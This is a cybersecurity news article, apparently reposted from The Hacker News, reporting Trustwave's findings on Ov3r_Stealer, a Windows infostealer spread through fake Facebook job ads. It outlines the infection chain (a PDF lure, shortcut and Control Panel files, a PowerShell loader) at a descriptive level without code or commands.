Fake Facebook Job Ads Spreading ‘Ov3r_Stealer’ to Steal Cryptocurrencies and Credentials

Crypto and Credentials

Threat actors are using fake Facebook job postings as a lure to trick potential targets into installing a new Windows-based stealer malware codenamed Ov3r_Stealer.

“This malware is designed to steal credentials and crypto wallets and send them to a Telegram channel that the threat actor monitors,” according to Trustwave SpiderLabs said in a report shared with The Hacker News.

Ov3r_Stealer can siphon IP address-based location, hardware information, passwords, cookies, credit card information, autofill, browser extensions, crypto wallets, Microsoft Office documents, and a list of antivirus products installed on the affected host.

While the exact end goal of the campaign is unknown, it is likely that the stolen information will be offered for sale to other threat actors. Another possibility is that Ov3r_Stealer can be updated over time to be like QakBot-like loader for additional payloads, including ransomware.

The starting point of the attack is a weaponized PDF file that masquerades as a file hosted on OneDrive and prompts users to click an embedded “Access Document” button.

Trustwave said it identified the PDF file shared on a fake Facebook account posing as Amazon CEO Andy Jassy, ​​and through Facebook ads for digital advertising jobs.

Users who eventually click the button are presented with an Internet shortcut file (.URL) masquerading as a DocuSign document hosted on Discord’s Content Delivery Network (CDN). The shortcut file then acts as a conduit to deliver a Control Panel Item (.CPL) file, which is then executed using the Windows Control Panel binary process (“control.exe“).

Executing the CPL file leads to retrieving a PowerShell loader (“DATA1.txt”) from a GitHub repository to finally launch Ov3r_Stealer.

Facebook Jobs

It’s worth noting at this stage that Trend Micro recently revealed a nearly identical infection chain used by threat actors to drop another stealer called Phemedrone Stealer by abusing the Microsoft Windows Defender SmartScreen bypass error (CVE-2023-36025, CVSS score: 8.8).

The similarities extend to the GitHub repository used (nateeintanan2527) and the fact that Ov3r_Stealer shares code-level overlaps with Phemedrone.

“This malware was recently reported and Phemedrone may have been repurposed and renamed to Ov3r_Stealer,” Trustwave said. “The main difference between the two is that Phemedrone is written in C#.”

The findings come as Hudson Rock revealed that threat actors are advertising their access to law enforcement request portals from major organizations such as Binance, Google, Meta and TikTok by misusing credentials obtained through infostealer infections.

They also track the emergence of a category of infections called CrackedCantil that use cracked software as an initial entry vector to drop loaders like PrivateLoader and SmokeLoader, and then act as a delivery mechanism for information stealers, crypto miners, proxy botnets, and ransomware.

#Fake #Facebook #Job #Ads #Spreading #Ov3r_Stealer #Steal #Cryptocurrencies #Credentials

Notify of
Inline Feedbacks
View all comments
Previous Post
TeamCity On-Premises Flaw

Critical internal error in JetBrains TeamCity exposes servers to takeover

Next Post
SaaS Security Posture

How a $10B enterprise customer dramatically increased their SaaS security posture with a 201% ROI using SSPM

Related Posts